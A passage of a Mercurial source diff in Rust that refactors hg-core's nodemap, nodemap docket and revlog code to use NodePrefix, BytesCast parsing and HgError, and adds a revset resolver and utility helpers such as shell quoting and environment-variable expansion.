fn set(&mut self, nybble: u8, element: Element) {
- let values = RawElement::to_be_bytes(element.into());
- let index = nybble as usize * mem::size_of::<RawElement>();
- self.0[index] = values[0];
- self.0[index + 1] = values[1];
- self.0[index + 2] = values[2];
- self.0[index + 3] = values[3];
+ self.0[nybble as usize] = element.into()
}
}
@@ -295,7 +245,7 @@
/// Return `None` unless the `Node` for `rev` has given prefix in `index`.
fn has_prefix_or_none(
idx: &impl RevlogIndex,
- prefix: NodePrefixRef,
+ prefix: NodePrefix,
rev: Revision,
) -> Result<Option<Revision>, NodeMapError> {
idx.node(rev)
@@ -316,7 +266,7 @@
/// revision is the only one for a *subprefix* of the one being looked up.
fn validate_candidate(
idx: &impl RevlogIndex,
- prefix: NodePrefixRef,
+ prefix: NodePrefix,
candidate: (Option<Revision>, usize),
) -> Result<(Option<Revision>, usize), NodeMapError> {
let (rev, steps) = candidate;
@@ -398,16 +348,17 @@
// Transmute the `Vec<Block>` to a `Vec<u8>`. Blocks are contiguous
// bytes, so this is perfectly safe.
let bytes = unsafe {
- // Assert that `Block` hasn't been changed and has no padding
- let _: [u8; 4 * BLOCK_SIZE] =
- std::mem::transmute([Block::new(); 4]);
+ // Check for compatible allocation layout.
+ // (Optimized away by constant-folding + dead code elimination.)
+ assert_eq!(size_of::<Block>(), 64);
+ assert_eq!(align_of::<Block>(), 1);
// /!\ Any use of `vec` after this is use-after-free.
// TODO: use `into_raw_parts` once stabilized
Vec::from_raw_parts(
vec.as_ptr() as *mut u8,
- vec.len() * BLOCK_SIZE,
- vec.capacity() * BLOCK_SIZE,
+ vec.len() * size_of::<Block>(),
+ vec.capacity() * size_of::<Block>(),
)
};
(readonly, bytes)
@@ -442,7 +393,7 @@
/// `NodeTree`).
fn lookup(
&self,
- prefix: NodePrefixRef,
+ prefix: NodePrefix,
) -> Result<(Option<Revision>, usize), NodeMapError> {
for (i, visit_item) in self.visit(prefix).enumerate() {
if let Some(opt) = visit_item.final_revision() {
@@ -452,10 +403,7 @@
Err(NodeMapError::MultipleResults)
}
- fn visit<'n, 'p>(
- &'n self,
- prefix: NodePrefixRef<'p>,
- ) -> NodeTreeVisitor<'n, 'p> {
+ fn visit<'n>(&'n self, prefix: NodePrefix) -> NodeTreeVisitor<'n> {
NodeTreeVisitor {
nt: self,
prefix,
@@ -613,7 +561,7 @@
amount: usize,
) -> Self {
assert!(buffer.len() >= amount);
- let len_in_blocks = amount / BLOCK_SIZE;
+ let len_in_blocks = amount / size_of::<Block>();
NodeTreeBytes {
buffer,
len_in_blocks,
@@ -625,18 +573,17 @@
type Target = [Block];
fn deref(&self) -> &[Block] {
- unsafe {
- slice::from_raw_parts(
- (&self.buffer).as_ptr() as *const Block,
- self.len_in_blocks,
- )
- }
+ Block::slice_from_bytes(&self.buffer, self.len_in_blocks)
+ // `NodeTreeBytes::new` already asserted that `self.buffer` is
+ // large enough.
+ .unwrap()
+ .0
}
}
-struct NodeTreeVisitor<'n, 'p> {
+struct NodeTreeVisitor<'n> {
nt: &'n NodeTree,
- prefix: NodePrefixRef<'p>,
+ prefix: NodePrefix,
visit: usize,
nybble_idx: usize,
done: bool,
@@ -649,11 +596,11 @@
element: Element,
}
-impl<'n, 'p> Iterator for NodeTreeVisitor<'n, 'p> {
+impl<'n> Iterator for NodeTreeVisitor<'n> {
type Item = NodeTreeVisitItem;
fn next(&mut self) -> Option<Self::Item> {
- if self.done || self.nybble_idx >= self.prefix.len() {
+ if self.done || self.nybble_idx >= self.prefix.nybbles_len() {
return None;
}
@@ -718,18 +665,18 @@
fn find_bin<'a>(
&self,
idx: &impl RevlogIndex,
- prefix: NodePrefixRef<'a>,
+ prefix: NodePrefix,
) -> Result<Option<Revision>, NodeMapError> {
- validate_candidate(idx, prefix.clone(), self.lookup(prefix)?)
+ validate_candidate(idx, prefix, self.lookup(prefix)?)
.map(|(opt, _shortest)| opt)
}
fn unique_prefix_len_bin<'a>(
&self,
idx: &impl RevlogIndex,
- prefix: NodePrefixRef<'a>,
+ prefix: NodePrefix,
) -> Result<Option<usize>, NodeMapError> {
- validate_candidate(idx, prefix.clone(), self.lookup(prefix)?)
+ validate_candidate(idx, prefix, self.lookup(prefix)?)
.map(|(opt, shortest)| opt.map(|_rev| shortest))
}
}
@@ -774,13 +721,13 @@
let mut raw = [255u8; 64];
let mut counter = 0;
- for val in [0, 15, -2, -1, -3].iter() {
- for byte in RawElement::to_be_bytes(*val).iter() {
+ for val in [0_i32, 15, -2, -1, -3].iter() {
+ for byte in val.to_be_bytes().iter() {
raw[counter] = *byte;
counter += 1;
}
}
- let block = Block(raw);
+ let (block, _) = Block::from_bytes(&raw).unwrap();
assert_eq!(block.get(0), Element::Block(0));
assert_eq!(block.get(1), Element::Block(15));
assert_eq!(block.get(3), Element::None);
@@ -822,6 +769,10 @@
])
}
+ fn hex(s: &str) -> NodePrefix {
+ NodePrefix::from_hex(s).unwrap()
+ }
+
#[test]
fn test_nt_debug() {
let nt = sample_nodetree();
@@ -840,11 +791,11 @@
pad_insert(&mut idx, 1, "1234deadcafe");
let nt = NodeTree::from(vec![block! {1: Rev(1)}]);
- assert_eq!(nt.find_hex(&idx, "1")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "12")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "1234de")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "1a")?, None);
- assert_eq!(nt.find_hex(&idx, "ab")?, None);
+ assert_eq!(nt.find_bin(&idx, hex("1"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("12"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("1234de"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("1a"))?, None);
+ assert_eq!(nt.find_bin(&idx, hex("ab"))?, None);
// and with full binary Nodes
assert_eq!(nt.find_node(&idx, idx.get(&1).unwrap())?, Some(1));
@@ -861,12 +812,12 @@
let nt = sample_nodetree();
- assert_eq!(nt.find_hex(&idx, "0"), Err(MultipleResults));
- assert_eq!(nt.find_hex(&idx, "01"), Ok(Some(9)));
- assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults));
- assert_eq!(nt.find_hex(&idx, "00a"), Ok(Some(0)));
- assert_eq!(nt.unique_prefix_len_hex(&idx, "00a"), Ok(Some(3)));
- assert_eq!(nt.find_hex(&idx, "000"), Ok(Some(NULL_REVISION)));
+ assert_eq!(nt.find_bin(&idx, hex("0")), Err(MultipleResults));
+ assert_eq!(nt.find_bin(&idx, hex("01")), Ok(Some(9)));
+ assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults));
+ assert_eq!(nt.find_bin(&idx, hex("00a")), Ok(Some(0)));
+ assert_eq!(nt.unique_prefix_len_bin(&idx, hex("00a")), Ok(Some(3)));
+ assert_eq!(nt.find_bin(&idx, hex("000")), Ok(Some(NULL_REVISION)));
}
#[test]
@@ -884,13 +835,13 @@
root: block![0: Block(1), 1:Block(3), 12: Rev(2)],
masked_inner_blocks: 1,
};
- assert_eq!(nt.find_hex(&idx, "10")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "c")?, Some(2));
- assert_eq!(nt.unique_prefix_len_hex(&idx, "c")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults));
- assert_eq!(nt.find_hex(&idx, "000")?, Some(NULL_REVISION));
- assert_eq!(nt.unique_prefix_len_hex(&idx, "000")?, Some(3));
- assert_eq!(nt.find_hex(&idx, "01")?, Some(9));
+ assert_eq!(nt.find_bin(&idx, hex("10"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("c"))?, Some(2));
+ assert_eq!(nt.unique_prefix_len_bin(&idx, hex("c"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults));
+ assert_eq!(nt.find_bin(&idx, hex("000"))?, Some(NULL_REVISION));
+ assert_eq!(nt.unique_prefix_len_bin(&idx, hex("000"))?, Some(3));
+ assert_eq!(nt.find_bin(&idx, hex("01"))?, Some(9));
assert_eq!(nt.masked_readonly_blocks(), 2);
Ok(())
}
@@ -923,14 +874,14 @@
&self,
prefix: &str,
) -> Result<Option<Revision>, NodeMapError> {
- self.nt.find_hex(&self.index, prefix)
+ self.nt.find_bin(&self.index, hex(prefix))
}
fn unique_prefix_len_hex(
&self,
prefix: &str,
) -> Result<Option<usize>, NodeMapError> {
- self.nt.unique_prefix_len_hex(&self.index, prefix)
+ self.nt.unique_prefix_len_bin(&self.index, hex(prefix))
}
/// Drain `added` and restart a new one
@@ -1108,7 +1059,7 @@
let (_, bytes) = idx.nt.into_readonly_and_added_bytes();
// only the root block has been changed
- assert_eq!(bytes.len(), BLOCK_SIZE);
+ assert_eq!(bytes.len(), size_of::<Block>());
// big endian for -2
assert_eq!(&bytes[4..2 * 4], [255, 255, 255, 254]);
// big endian for -6
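
One detail worth spelling out from the hunks above: each block slot is a big-endian `i32` in which non-negative values index another block, `-1` marks an absent slot (what `Block::new` fills in), and anything below `-1` encodes a revision as `-rev - 2`. A standalone sketch of the decoding, with plain `i32` standing in for `unaligned::I32Be`:

    #[derive(Debug, PartialEq)]
    enum Element {
        None,         // absent slot; `Block::new` fills blocks with -1
        Block(usize), // non-negative: index of another block
        Rev(i32),     // encoded as `-rev - 2` to stay clear of -1 and 0
    }

    fn decode(int: i32) -> Element {
        if int >= 0 {
            Element::Block(int as usize)
        } else if int == -1 {
            Element::None
        } else {
            Element::Rev(-int - 2)
        }
    }

    fn main() {
        assert_eq!(decode(-1), Element::None);
        assert_eq!(decode(0), Element::Block(0));
        assert_eq!(decode(15), Element::Block(15));
        assert_eq!(decode(-2), Element::Rev(0));
        assert_eq!(decode(-6), Element::Rev(4)); // the -6 asserted just above
    }
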
--- a/rust/hg-core/src/revlog/nodemap_docket.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/nodemap_docket.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,7 @@
+use crate::errors::{HgError, HgResultExt};
+use crate::requirements;
+use bytes_cast::{unaligned, BytesCast};
use memmap::Mmap;
-use std::convert::TryInto;
use std::path::{Path, PathBuf};
use super::revlog::RevlogError;
@@ -13,6 +15,16 @@
// TODO: keep here more of the data from `parse()` when we need it
}
+#[derive(BytesCast)]
+#[repr(C)]
+struct DocketHeader {
+ uid_size: u8,
+ _tip_rev: unaligned::U64Be,
+ data_length: unaligned::U64Be,
+ _data_unused: unaligned::U64Be,
+ tip_node_size: unaligned::U64Be,
+}
+
impl NodeMapDocket {
/// Return `Ok(None)` when the caller should proceed without a persistent
/// nodemap:
@@ -27,83 +39,71 @@
repo: &Repo,
index_path: &Path,
) -> Result<Option<(Self, Mmap)>, RevlogError> {
+ if !repo
+ .requirements()
+ .contains(requirements::NODEMAP_REQUIREMENT)
+ {
+ // If .hg/requires does not opt in, don’t try to open a nodemap
+ return Ok(None);
+ }
+
let docket_path = index_path.with_extension("n");
- let docket_bytes = match repo.store_vfs().read(&docket_path) {
- Err(e) if e.kind() == std::io::ErrorKind::NotFound => {
- return Ok(None)
- }
- Err(e) => return Err(RevlogError::IoError(e)),
- Ok(bytes) => bytes,
+ let docket_bytes = if let Some(bytes) =
+ repo.store_vfs().read(&docket_path).io_not_found_as_none()?
+ {
+ bytes
+ } else {
+ return Ok(None);
};
- let mut input = if let Some((&ONDISK_VERSION, rest)) =
+ let input = if let Some((&ONDISK_VERSION, rest)) =
docket_bytes.split_first()
{
rest
} else {
return Ok(None);
};
- let input = &mut input;
- let uid_size = read_u8(input)? as usize;
- let _tip_rev = read_be_u64(input)?;
+ /// Treat any error as a parse error
+ fn parse<T, E>(result: Result<T, E>) -> Result<T, RevlogError> {
+ result.map_err(|_| {
+ HgError::corrupted("nodemap docket parse error").into()
+ })
+ }
+
+ let (header, rest) = parse(DocketHeader::from_bytes(input))?;
+ let uid_size = header.uid_size as usize;
// TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit
// systems?
- let data_length = read_be_u64(input)? as usize;
- let _data_unused = read_be_u64(input)?;
- let tip_node_size = read_be_u64(input)? as usize;
- let uid = read_bytes(input, uid_size)?;
- let _tip_node = read_bytes(input, tip_node_size)?;
-
- let uid =
- std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?;
+ let tip_node_size = header.tip_node_size.get() as usize;
+ let data_length = header.data_length.get() as usize;
+ let (uid, rest) = parse(u8::slice_from_bytes(rest, uid_size))?;
+ let (_tip_node, _rest) =
+ parse(u8::slice_from_bytes(rest, tip_node_size))?;
+ let uid = parse(std::str::from_utf8(uid))?;
let docket = NodeMapDocket { data_length };
let data_path = rawdata_path(&docket_path, uid);
- // TODO: use `std::fs::read` here when the `persistent-nodemap.mmap`
+ // TODO: use `vfs.read()` here when the `persistent-nodemap.mmap`
// config is false?
- match repo.store_vfs().mmap_open(&data_path) {
- Ok(mmap) => {
- if mmap.len() >= data_length {
- Ok(Some((docket, mmap)))
- } else {
- Err(RevlogError::Corrupted)
- }
+ if let Some(mmap) = repo
+ .store_vfs()
+ .mmap_open(&data_path)
+ .io_not_found_as_none()?
+ {
+ if mmap.len() >= data_length {
+ Ok(Some((docket, mmap)))
+ } else {
+ Err(HgError::corrupted("persistent nodemap too short").into())
}
- Err(error) => {
- if error.kind() == std::io::ErrorKind::NotFound {
- Ok(None)
- } else {
- Err(RevlogError::IoError(error))
- }
- }
+ } else {
+ // Even if .hg/requires opted in, some revlogs are deemed small
+ // enough to not need a persistent nodemap.
+ Ok(None)
}
}
}
-fn read_bytes<'a>(
- input: &mut &'a [u8],
- count: usize,
-) -> Result<&'a [u8], RevlogError> {
- if let Some(start) = input.get(..count) {
- *input = &input[count..];
- Ok(start)
- } else {
- Err(RevlogError::Corrupted)
- }
-}
-
-fn read_u8<'a>(input: &mut &[u8]) -> Result<u8, RevlogError> {
- Ok(read_bytes(input, 1)?[0])
-}
-
-fn read_be_u64<'a>(input: &mut &[u8]) -> Result<u64, RevlogError> {
- let array = read_bytes(input, std::mem::size_of::<u64>())?
- .try_into()
- .unwrap();
- Ok(u64::from_be_bytes(array))
-}
-
fn rawdata_path(docket_path: &Path, uid: &str) -> PathBuf {
let docket_name = docket_path
.file_name()
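
`DocketHeader` with `BytesCast` replaces the hand-rolled cursor helpers deleted above. For readers unfamiliar with that crate, a hedged std-only sketch of the same parse (the helper names echo the removed functions; error handling is simplified to `Option`):

    use std::convert::TryInto;

    fn read_bytes<'a>(input: &mut &'a [u8], count: usize) -> Option<&'a [u8]> {
        let bytes = input.get(..count)?;
        *input = &input[count..];
        Some(bytes)
    }

    fn read_be_u64(input: &mut &[u8]) -> Option<u64> {
        Some(u64::from_be_bytes(read_bytes(input, 8)?.try_into().ok()?))
    }

    struct Header {
        uid_size: u8,
        _tip_rev: u64,
        data_length: u64,
        _data_unused: u64,
        tip_node_size: u64,
    }

    fn parse_header(input: &mut &[u8]) -> Option<Header> {
        // Fields are read in declaration order, matching the on-disk layout.
        Some(Header {
            uid_size: read_bytes(input, 1)?[0],
            _tip_rev: read_be_u64(input)?,
            data_length: read_be_u64(input)?,
            _data_unused: read_be_u64(input)?,
            tip_node_size: read_be_u64(input)?,
        })
    }

    fn main() {
        let mut bytes = vec![40u8]; // uid_size
        bytes.extend_from_slice(&[0u8; 32]); // four zeroed big-endian u64 fields
        let mut input = &bytes[..];
        let header = parse_header(&mut input).unwrap();
        assert_eq!((header.uid_size, header.data_length), (40, 0));
        assert_eq!(header.tip_node_size, 0);
    }
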
--- a/rust/hg-core/src/revlog/revlog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/revlog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -11,22 +11,39 @@
use zstd;
use super::index::Index;
-use super::node::{NodePrefixRef, NODE_BYTES_LENGTH, NULL_NODE};
+use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE};
use super::nodemap;
-use super::nodemap::NodeMap;
+use super::nodemap::{NodeMap, NodeMapError};
use super::nodemap_docket::NodeMapDocket;
use super::patch;
+use crate::errors::HgError;
use crate::repo::Repo;
use crate::revlog::Revision;
+#[derive(derive_more::From)]
pub enum RevlogError {
- IoError(std::io::Error),
- UnsuportedVersion(u16),
InvalidRevision,
+ /// Working directory is not supported
+ WDirUnsupported,
/// Found more than one entry whose ID match the requested prefix
AmbiguousPrefix,
- Corrupted,
- UnknowDataFormat(u8),
+ #[from]
+ Other(HgError),
+}
+
+impl From<NodeMapError> for RevlogError {
+ fn from(error: NodeMapError) -> Self {
+ match error {
+ NodeMapError::MultipleResults => RevlogError::AmbiguousPrefix,
+ NodeMapError::RevisionNotInIndex(_) => RevlogError::corrupted(),
+ }
+ }
+}
+
+impl RevlogError {
+ fn corrupted() -> Self {
+ RevlogError::Other(HgError::corrupted("corrupted revlog"))
+ }
}
/// Read only implementation of revlog.
@@ -34,7 +51,7 @@
/// When index and data are not interleaved: bytes of the revlog index.
/// When index and data are interleaved: bytes of the revlog index and
/// data.
- index: Index,
+ pub(crate) index: Index,
/// When index and data are not interleaved: bytes of the revlog data
data_bytes: Option<Box<dyn Deref<Target = [u8]> + Send>>,
/// When present on disk: the persistent nodemap for this revlog
@@ -53,14 +70,12 @@
data_path: Option<&Path>,
) -> Result<Self, RevlogError> {
let index_path = index_path.as_ref();
- let index_mmap = repo
- .store_vfs()
- .mmap_open(&index_path)
- .map_err(RevlogError::IoError)?;
+ let index_mmap = repo.store_vfs().mmap_open(&index_path)?;
let version = get_version(&index_mmap);
if version != 1 {
- return Err(RevlogError::UnsuportedVersion(version));
+ // A proper new version should have had a repo/store requirement.
+ return Err(RevlogError::corrupted());
}
let index = Index::new(Box::new(index_mmap))?;
@@ -74,10 +89,7 @@
None
} else {
let data_path = data_path.unwrap_or(&default_data_path);
- let data_mmap = repo
- .store_vfs()
- .mmap_open(data_path)
- .map_err(RevlogError::IoError)?;
+ let data_mmap = repo.store_vfs().mmap_open(data_path)?;
Some(Box::new(data_mmap))
};
@@ -111,13 +123,11 @@
#[timed]
pub fn get_node_rev(
&self,
- node: NodePrefixRef,
+ node: NodePrefix,
) -> Result<Revision, RevlogError> {
if let Some(nodemap) = &self.nodemap {
return nodemap
- .find_bin(&self.index, node)
- // TODO: propagate details of this error:
- .map_err(|_| RevlogError::Corrupted)?
+ .find_bin(&self.index, node)?
.ok_or(RevlogError::InvalidRevision);
}
@@ -130,7 +140,9 @@
let mut found_by_prefix = None;
for rev in (0..self.len() as Revision).rev() {
let index_entry =
- self.index.get_entry(rev).ok_or(RevlogError::Corrupted)?;
+ self.index.get_entry(rev).ok_or(HgError::corrupted(
+ "revlog references a revision not in the index",
+ ))?;
if node == *index_entry.hash() {
return Ok(rev);
}
@@ -144,6 +156,11 @@
found_by_prefix.ok_or(RevlogError::InvalidRevision)
}
+ /// Returns whether the given revision exists in this revlog.
+ pub fn has_rev(&self, rev: Revision) -> bool {
+ self.index.get_entry(rev).is_some()
+ }
+
/// Return the full data associated to a revision.
///
/// All entries required to build the final data out of deltas will be
@@ -156,8 +173,9 @@
let mut delta_chain = vec![];
while let Some(base_rev) = entry.base_rev {
delta_chain.push(entry);
- entry =
- self.get_entry(base_rev).or(Err(RevlogError::Corrupted))?;
+ entry = self
+ .get_entry(base_rev)
+ .map_err(|_| RevlogError::corrupted())?;
}
// TODO do not look twice in the index
@@ -180,7 +198,7 @@
) {
Ok(data)
} else {
- Err(RevlogError::Corrupted)
+ Err(RevlogError::corrupted())
}
}
@@ -290,7 +308,8 @@
b'x' => Ok(Cow::Owned(self.uncompressed_zlib_data()?)),
// zstd data.
b'\x28' => Ok(Cow::Owned(self.uncompressed_zstd_data()?)),
- format_type => Err(RevlogError::UnknowDataFormat(format_type)),
+ // A proper new format should have had a repo/store requirement.
+ _format_type => Err(RevlogError::corrupted()),
}
}
@@ -300,13 +319,13 @@
let mut buf = Vec::with_capacity(self.compressed_len);
decoder
.read_to_end(&mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
Ok(buf)
} else {
let mut buf = vec![0; self.uncompressed_len];
decoder
.read_exact(&mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
Ok(buf)
}
}
@@ -315,14 +334,14 @@
if self.is_delta() {
let mut buf = Vec::with_capacity(self.compressed_len);
zstd::stream::copy_decode(self.bytes, &mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
Ok(buf)
} else {
let mut buf = vec![0; self.uncompressed_len];
let len = zstd::block::decompress_to_buffer(self.bytes, &mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
if len != self.uncompressed_len {
- Err(RevlogError::Corrupted)
+ Err(RevlogError::corrupted())
} else {
Ok(buf)
}
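
As background for the `base_rev` loop in `get_rev_data` above: a revision's content is reconstructed by walking base-revision links back to a full snapshot, then applying the collected deltas. A simplified sketch of that walk (the types are stand-ins, not hg-core's):

    struct Entry {
        base_rev: Option<usize>,
    }

    /// Return the revisions to combine, from the requested one back to the
    /// snapshot it is ultimately based on.
    fn delta_chain(revlog: &[Entry], rev: usize) -> Vec<usize> {
        let mut chain = vec![rev];
        let mut current = rev;
        while let Some(base) = revlog[current].base_rev {
            chain.push(base);
            current = base;
        }
        chain
    }

    fn main() {
        let revlog = [
            Entry { base_rev: None },    // rev 0: full snapshot
            Entry { base_rev: Some(0) }, // rev 1: delta against rev 0
            Entry { base_rev: Some(1) }, // rev 2: delta against rev 1
        ];
        assert_eq!(delta_chain(&revlog, 2), vec![2, 1, 0]);
    }
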
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/revset.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,62 @@
+//! The revset query language
+//!
+//! <https://www.mercurial-scm.org/repo/hg/help/revsets>
+
+use crate::errors::HgError;
+use crate::repo::Repo;
+use crate::revlog::changelog::Changelog;
+use crate::revlog::revlog::{Revlog, RevlogError};
+use crate::revlog::NodePrefix;
+use crate::revlog::{Revision, NULL_REVISION, WORKING_DIRECTORY_HEX};
+use crate::Node;
+
+/// Resolve a query string into a single revision.
+///
+/// Only some of the revset language is implemented yet.
+pub fn resolve_single(
+ input: &str,
+ repo: &Repo,
+) -> Result<Revision, RevlogError> {
+ let changelog = Changelog::open(repo)?;
+
+ match resolve_rev_number_or_hex_prefix(input, &changelog.revlog) {
+ Err(RevlogError::InvalidRevision) => {} // Try other syntax
+ result => return result,
+ }
+
+ if input == "null" {
+ return Ok(NULL_REVISION);
+ }
+
+ // TODO: support for the rest of the language here.
+
+ Err(
+ HgError::unsupported(format!("cannot parse revset '{}'", input))
+ .into(),
+ )
+}
+
+/// Resolve the small subset of the language suitable for revlogs other than
+/// the changelog, such as the `hg debugdata --manifest` CLI argument.
+///
+/// * A non-negative decimal integer for a revision number, or
+/// * A hexadecimal string, for the unique node ID that starts with this
+/// prefix
+pub fn resolve_rev_number_or_hex_prefix(
+ input: &str,
+ revlog: &Revlog,
+) -> Result<Revision, RevlogError> {
+ if let Ok(integer) = input.parse::<i32>() {
+ if integer >= 0 && revlog.has_rev(integer) {
+ return Ok(integer);
+ }
+ }
+ if let Ok(prefix) = NodePrefix::from_hex(input) {
+ if prefix.is_prefix_of(&Node::from_hex(WORKING_DIRECTORY_HEX).unwrap())
+ {
+ return Err(RevlogError::WDirUnsupported);
+ }
+ return revlog.get_node_rev(prefix);
+ }
+ Err(RevlogError::InvalidRevision)
+}
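
Note the ordering in `resolve_rev_number_or_hex_prefix`: the decimal parse is tried before the hex lookup, so an all-digit input such as `10` resolves as a revision number even though it is also a valid hex prefix. A standalone illustration of that precedence (`is_known_rev` is a hypothetical stand-in for the revlog query):

    fn resolve(input: &str, is_known_rev: impl Fn(i32) -> bool) -> &'static str {
        // Decimal revision numbers win over the hex interpretation.
        if let Ok(n) = input.parse::<i32>() {
            if n >= 0 && is_known_rev(n) {
                return "revision number";
            }
        }
        if !input.is_empty() && input.bytes().all(|b| b.is_ascii_hexdigit()) {
            return "node prefix";
        }
        "invalid"
    }

    fn main() {
        let known = |n: i32| n < 100;
        assert_eq!(resolve("10", known), "revision number"); // not hex 0x10
        assert_eq!(resolve("ca", known), "node prefix");
        assert_eq!(resolve("spam", known), "invalid");
    }
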
--- a/rust/hg-core/src/utils.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/utils.rs Tue Apr 20 11:01:06 2021 -0400
@@ -7,7 +7,12 @@
//! Contains useful functions, traits, structs, etc. for use in core.
+use crate::errors::{HgError, IoErrorContext};
use crate::utils::hg_path::HgPath;
+use im_rc::ordmap::DiffItem;
+use im_rc::ordmap::OrdMap;
+use std::cell::Cell;
+use std::fmt;
use std::{io::Write, ops::Deref};
pub mod files;
@@ -62,10 +67,12 @@
}
pub trait SliceExt {
+ fn trim_end_newlines(&self) -> &Self;
fn trim_end(&self) -> &Self;
fn trim_start(&self) -> &Self;
fn trim(&self) -> &Self;
fn drop_prefix(&self, needle: &Self) -> Option<&Self>;
+ fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])>;
}
#[allow(clippy::trivially_copy_pass_by_ref)]
@@ -74,6 +81,13 @@
}
impl SliceExt for [u8] {
+ fn trim_end_newlines(&self) -> &[u8] {
+ if let Some(last) = self.iter().rposition(|&byte| byte != b'\n') {
+ &self[..=last]
+ } else {
+ &[]
+ }
+ }
fn trim_end(&self) -> &[u8] {
if let Some(last) = self.iter().rposition(is_not_whitespace) {
&self[..=last]
@@ -115,6 +129,13 @@
None
}
}
+
+ fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])> {
+ let mut iter = self.splitn(2, |&byte| byte == separator);
+ let a = iter.next()?;
+ let b = iter.next()?;
+ Some((a, b))
+ }
}
pub trait Escaped {
@@ -176,3 +197,287 @@
None
}
}
+
+#[cfg(unix)]
+pub fn shell_quote(value: &[u8]) -> Vec<u8> {
+ // TODO: Use the `matches!` macro when we require Rust 1.42+
+ if value.iter().all(|&byte| match byte {
+ b'a'..=b'z'
+ | b'A'..=b'Z'
+ | b'0'..=b'9'
+ | b'.'
+ | b'_'
+ | b'/'
+ | b'+'
+ | b'-' => true,
+ _ => false,
+ }) {
+ value.to_owned()
+ } else {
+ let mut quoted = Vec::with_capacity(value.len() + 2);
+ quoted.push(b'\'');
+ for &byte in value {
+ if byte == b'\'' {
+ quoted.push(b'\\');
+ }
+ quoted.push(byte);
+ }
+ quoted.push(b'\'');
+ quoted
+ }
+}
+
+pub fn current_dir() -> Result<std::path::PathBuf, HgError> {
+ std::env::current_dir().map_err(|error| HgError::IoError {
+ error,
+ context: IoErrorContext::CurrentDir,
+ })
+}
+
+pub fn current_exe() -> Result<std::path::PathBuf, HgError> {
+ std::env::current_exe().map_err(|error| HgError::IoError {
+ error,
+ context: IoErrorContext::CurrentExe,
+ })
+}
+
+/// Expand `$FOO` and `${FOO}` environment variables in the given byte string
+pub fn expand_vars(s: &[u8]) -> std::borrow::Cow<[u8]> {
+ lazy_static::lazy_static! {
+ /// https://github.com/python/cpython/blob/3.9/Lib/posixpath.py#L301
+ /// The `x` makes whitespace ignored.
+ /// `-u` disables the Unicode flag, which makes `\w` match like Python's `\w` with the ASCII flag.
+ static ref VAR_RE: regex::bytes::Regex =
+ regex::bytes::Regex::new(r"(?x-u)
+ \$
+ (?:
+ (\w+)
+ |
+ \{
+ ([^}]*)
+ \}
+ )
+ ").unwrap();
+ }
+ VAR_RE.replace_all(s, |captures: &regex::bytes::Captures| {
+ let var_name = files::get_os_str_from_bytes(
+ captures
+ .get(1)
+ .or_else(|| captures.get(2))
+ .expect("either side of `|` must participate in match")
+ .as_bytes(),
+ );
+ std::env::var_os(var_name)
+ .map(files::get_bytes_from_os_str)
+ .unwrap_or_else(|| {
+ // Referencing an environment variable that does not exist.
+ // Leave the $FOO reference as-is.
+ captures[0].to_owned()
+ })
+ })
+}
+
+#[test]
+fn test_expand_vars() {
+ // Modifying process-global state in a test isn’t great,
+ // but hopefully this won’t collide with anything.
+ std::env::set_var("TEST_EXPAND_VAR", "1");
+ assert_eq!(
+ expand_vars(b"before/$TEST_EXPAND_VAR/after"),
+ &b"before/1/after"[..]
+ );
+ assert_eq!(
+ expand_vars(b"before${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}after"),
+ &b"before111after"[..]
+ );
+ let s = b"before $SOME_LONG_NAME_THAT_WE_ASSUME_IS_NOT_AN_ACTUAL_ENV_VAR after";
+ assert_eq!(expand_vars(s), &s[..]);
+}
+
+pub(crate) enum MergeResult<V> {
+ UseLeftValue,
+ UseRightValue,
+ UseNewValue(V),
+}
+
+/// Return the union of the two given maps,
+/// calling `merge(key, left_value, right_value)` to resolve keys that exist in
+/// both.
+///
+/// CC https://github.com/bodil/im-rs/issues/166
+pub(crate) fn ordmap_union_with_merge<K, V>(
+ left: OrdMap<K, V>,
+ right: OrdMap<K, V>,
+ mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>,
+) -> OrdMap<K, V>
+where
+ K: Clone + Ord,
+ V: Clone + PartialEq,
+{
+ if left.ptr_eq(&right) {
+ // One of the two maps is an unmodified clone of the other
+ left
+ } else if left.len() / 2 > right.len() {
+ // When two maps have different sizes,
+ // their size difference is a lower bound on
+ // how many keys of the larger map are not also in the smaller map.
+ // This in turn is a lower bound on the number of differences in
+ // `OrdMap::diff` and the "amount of work" that would be done
+ // by `ordmap_union_with_merge_by_diff`.
+ //
+ // Here `left` is more than twice the size of `right`,
+ // so the number of differences is more than the total size of
+ // `right`. Therefore an algorithm based on iterating `right`
+ // is more efficient.
+ //
+ // This helps a lot when a tiny (or empty) map is merged
+ // with a large one.
